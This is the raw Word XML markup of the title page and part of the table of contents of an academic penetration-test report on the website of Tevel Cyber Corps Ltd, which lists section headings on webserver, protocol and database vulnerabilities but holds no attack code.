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9C40F6" w14:textId="77777777" w:rsidR="00C5650F" w:rsidRDefault="00C5650F" w:rsidP="000E336C">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="56"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="0" w:name="_Hlk40094820"/>
      <w:bookmarkEnd w:id="0"/>
    </w:p>
    <w:p w14:paraId="6CFE5DDC" w14:textId="07C69FA0" w:rsidR="000E336C" w:rsidRDefault="000E336C" w:rsidP="000E336C">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:sz w:val="56"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="56"/>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0AF4ADCE" wp14:editId="1B72DA30">
            <wp:extent cx="4426527" cy="10553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8373" cy="1112996"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="5220BBA6" w14:textId="77777777" w:rsidR="000E336C" w:rsidRDefault="000E336C" w:rsidP="000E336C">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:sz w:val="72"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="54AB960D" w14:textId="6D80E974" w:rsidR="000E336C" w:rsidRPr="000E336C" w:rsidRDefault="000E336C" w:rsidP="000E336C">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="72"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="000E336C">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="72"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Tevel</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="000E336C">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="72"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> Cyber Corps Ltd </w:t>
      </w:r>
      <w:r w:rsidR="00631293">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="72"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Website </w:t>
      </w:r>
      <w:r w:rsidRPr="000E336C">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="72"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Blackbox </w:t>
      </w:r>
      <w:r w:rsidR="00631293" w:rsidRPr="000E336C">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="72"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Penetratio</w:t>
      </w:r>
      <w:r w:rsidR="00631293">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="72"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>n</w:t>
      </w:r>
      <w:r w:rsidRPr="000E336C">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="72"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> Test</w:t>
      </w:r>
      <w:r w:rsidR="00B858A3">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="72"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35761D99" w14:textId="77777777" w:rsidR="00F531C1" w:rsidRPr="000E336C" w:rsidRDefault="00F531C1" w:rsidP="00631293">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="72"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="49DF0595" w14:textId="6A58BA90" w:rsidR="000E336C" w:rsidRDefault="000E336C" w:rsidP="000E336C">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="48"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000E336C">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="72"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="000E336C">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="48"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Researcher: Mr Paul M Lawrence</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E2ECB4F" w14:textId="77777777" w:rsidR="00F531C1" w:rsidRPr="000E336C" w:rsidRDefault="00F531C1" w:rsidP="000E336C">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="72"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2066FF03" w14:textId="0BE5F23C" w:rsidR="000E336C" w:rsidRPr="000E336C" w:rsidRDefault="000E336C" w:rsidP="000E336C">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="48"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000E336C">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="48"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>In association with the University of Wales Trinity Saint David Swansea</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="234A557B" w14:textId="77777777" w:rsidR="000E336C" w:rsidRPr="000E336C" w:rsidRDefault="000E336C">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:sz w:val="48"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6A0FC00B" w14:textId="07415E25" w:rsidR="000E336C" w:rsidRPr="00F531C1" w:rsidRDefault="000E336C" w:rsidP="00F531C1">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:sz w:val="48"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="56"/>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0850CD95" wp14:editId="65AADBF8">
            <wp:extent cx="2920850" cy="1018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1418" cy="1095170"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B9C40FC" w14:textId="77777777" w:rsidR="00C5650F" w:rsidRDefault="0090297E">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:bookmarkStart w:id="1" w:name="_Toc40134027"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Contents</w:t>
      </w:r>
      <w:bookmarkEnd w:id="1"/>
    </w:p>
    <w:sdt>
      <w:sdtPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
          <w:color w:val="auto"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:id w:val="-1323420023"/>
        <w:docPartObj>
          <w:docPartGallery w:val="Table of Contents"/>
          <w:docPartUnique/>
        </w:docPartObj>
      </w:sdtPr>
      <w:sdtEndPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:noProof/>
        </w:rPr>
      </w:sdtEndPr>
      <w:sdtContent>
        <w:p w14:paraId="24C151F7" w14:textId="7E1DCEB3" w:rsidR="00F878AE" w:rsidRDefault="00F878AE">
          <w:pPr>
            <w:pStyle w:val="TOCHeading"/>
          </w:pPr>
          <w:r>
            <w:t>Contents</w:t>
          </w:r>
        </w:p>
        <w:p w14:paraId="7322809B" w14:textId="121D1F65" w:rsidR="00F878AE" w:rsidRDefault="00F878AE">
          <w:pPr>
            <w:pStyle w:val="TOC1"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9016"/>
            </w:tabs>
            <w:rPr>
              <w:noProof/>
            </w:rPr>
          </w:pPr>
          <w:r>
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r>
            <w:instrText xml:space="preserve"> TOC \o "1-3" \h \z \u </w:instrText>
          </w:r>
          <w:r>
            <w:fldChar w:fldCharType="separate"/>
          </w:r>
          <w:hyperlink w:anchor="_Toc40134027" w:history="1">
            <w:r w:rsidRPr="0065571A">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Contents</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc40134027 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>2</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="0DACA66F" w14:textId="620212D4" w:rsidR="00F878AE" w:rsidRDefault="00556C31">
          <w:pPr>
            <w:pStyle w:val="TOC1"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9016"/>
            </w:tabs>
            <w:rPr>
              <w:noProof/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc40134028" w:history="1">
            <w:r w:rsidR="00F878AE" w:rsidRPr="0065571A">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Figures</w:t>
            </w:r>
            <w:r w:rsidR="00F878AE">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00F878AE">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="00F878AE">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc40134028 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="00F878AE">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="00F878AE">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00F878AE">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>3</w:t>
            </w:r>
            <w:r w:rsidR="00F878AE">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="3379A7FF" w14:textId="15F2C37E" w:rsidR="00F878AE" w:rsidRDefault="00556C31">
          <w:pPr>
            <w:pStyle w:val="TOC1"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9016"/>
            </w:tabs>
            <w:rPr>
              <w:noProof/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc40134029" w:history="1">
            <w:r w:rsidR="00F878AE" w:rsidRPr="0065571A">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Tables</w:t>
            </w:r>
            <w:r w:rsidR="00F878AE">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00F878AE">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="00F878AE">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc40134029 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="00F878AE">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="00F878AE">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00F878AE">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>3</w:t>
            </w:r>
            <w:r w:rsidR="00F878AE">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="5D2EB9E7" w14:textId="7B7FC498" w:rsidR="00F878AE" w:rsidRDefault="00556C31">
          <w:pPr>
            <w:pStyle w:val="TOC1"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9016"/>
            </w:tabs>
            <w:rPr>
              <w:noProof/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc40134030" w:history="1">
            <w:r w:rsidR="00F878AE" w:rsidRPr="0065571A">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>1.0 Introduction</w:t>
            </w:r>
            <w:r w:rsidR="00F878AE">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00F878AE">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="00F878AE">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc40134030 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="00F878AE">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="00F878AE">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00F878AE">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>4</w:t>
            </w:r>
            <w:r w:rsidR="00F878AE">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="649EABB5" w14:textId="664E4C26" w:rsidR="00F878AE" w:rsidRDefault="00556C31">
          <w:pPr>
            <w:pStyle w:val="TOC1"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9016"/>
            </w:tabs>
            <w:rPr>
              <w:noProof/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc40134031" w:history="1">
            <w:r w:rsidR="00F878AE" w:rsidRPr="0065571A">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>2.0 Background Research</w:t>
            </w:r>
            <w:r w:rsidR="00F878AE">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00F878AE">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="00F878AE">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc40134031 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="00F878AE">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="00F878AE">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00F878AE">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>5</w:t>
            </w:r>
            <w:r w:rsidR="00F878AE">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="362E21F6" w14:textId="4AF99353" w:rsidR="00F878AE" w:rsidRDefault="00556C31">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9016"/>
            </w:tabs>
            <w:rPr>
              <w:noProof/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc40134032" w:history="1">
            <w:r w:rsidR="00F878AE" w:rsidRPr="0065571A">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>2.1 Cloud Based Services and Security</w:t>
            </w:r>
            <w:r w:rsidR="00F878AE">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00F878AE">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="00F878AE">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc40134032 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="00F878AE">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="00F878AE">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00F878AE">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>5</w:t>
            </w:r>
            <w:r w:rsidR="00F878AE">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="22D9A0BA" w14:textId="6D1BC6C3" w:rsidR="00F878AE" w:rsidRDefault="00556C31">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9016"/>
            </w:tabs>
            <w:rPr>
              <w:noProof/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc40134033" w:history="1">
            <w:r w:rsidR="00F878AE" w:rsidRPr="0065571A">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>2.2 Operating System Architectures and Protocol Security</w:t>
            </w:r>
            <w:r w:rsidR="00F878AE">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00F878AE">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="00F878AE">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc40134033 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="00F878AE">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="00F878AE">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00F878AE">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>6</w:t>
            </w:r>
            <w:r w:rsidR="00F878AE">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="11F7C88E" w14:textId="789A207A" w:rsidR="00F878AE" w:rsidRDefault="00556C31">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9016"/>
            </w:tabs>
            <w:rPr>
              <w:noProof/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc40134034" w:history="1">
            <w:r w:rsidR="00F878AE" w:rsidRPr="0065571A">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>2.2.1 Linux Webserver Vulnerabilities</w:t>
            </w:r>
            <w:r w:rsidR="00F878AE">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00F878AE">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="00F878AE">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc40134034 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="00F878AE">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="00F878AE">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00F878AE">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>8</w:t>
            </w:r>
            <w:r w:rsidR="00F878AE">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="69D59FEA" w14:textId="5B86CF79" w:rsidR="00F878AE" w:rsidRDefault="00556C31">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9016"/>
            </w:tabs>
            <w:rPr>
              <w:noProof/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc40134035" w:history="1">
            <w:r w:rsidR="00F878AE" w:rsidRPr="0065571A">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>2.2.2 Webserver Protocols and Port Security</w:t>
            </w:r>
            <w:r w:rsidR="00F878AE">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00F878AE">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="00F878AE">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc40134035 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="00F878AE">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="00F878AE">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00F878AE">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>9</w:t>
            </w:r>
            <w:r w:rsidR="00F878AE">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="4364B3EB" w14:textId="217152B1" w:rsidR="00F878AE" w:rsidRDefault="00556C31">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9016"/>
            </w:tabs>
            <w:rPr>
              <w:noProof/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc40134036" w:history="1">
            <w:r w:rsidR="00F878AE" w:rsidRPr="0065571A">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>2.3 Hyper Text Mark-Up Language 5 (HTML5) and Database Security</w:t>
            </w:r>
            <w:r w:rsidR="00F878AE">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00F878AE">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="00F878AE">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc40134036 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="00F878AE">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="00F878AE">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00F878AE">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>10</w:t>
            </w:r>
            <w:r w:rsidR="00F878AE">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="09570508" w14:textId="165955FE" w:rsidR="00F878AE" w:rsidRDefault="00556C31">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9016"/>
            </w:tabs>
            <w:rPr>
              <w:noProof/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc40134037" w:history="1">
            <w:r w:rsidR="00F878AE" w:rsidRPr="0065571A">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>2.3.1 Hyper Text Transport Protocol Secure (HTTP) Vulnerabilities</w:t>
            </w:r>
            <w:r w:rsidR="00F878AE">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00F878AE">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="00F878AE">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc40134037 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="00F878AE">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="00F878AE">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00F878AE">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>10</w:t>
            </w:r>
            <w:r w:rsidR="00F878AE">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="6A68C265" w14:textId="78BCAA12" w:rsidR="00F878AE" w:rsidRDefault="00556C31">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9016"/>
            </w:tabs>
            <w:rPr>
              <w:noProof/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc40134038" w:history="1">
            <w:r w:rsidR="00F878AE" w:rsidRPr="0065571A">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>2.3.2 Website Frontend and Backend Database Vulnerabilities</w:t>
            </w:r>
            <w:r w:rsidR="00F878AE">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00F878AE">
              <w:rPr>
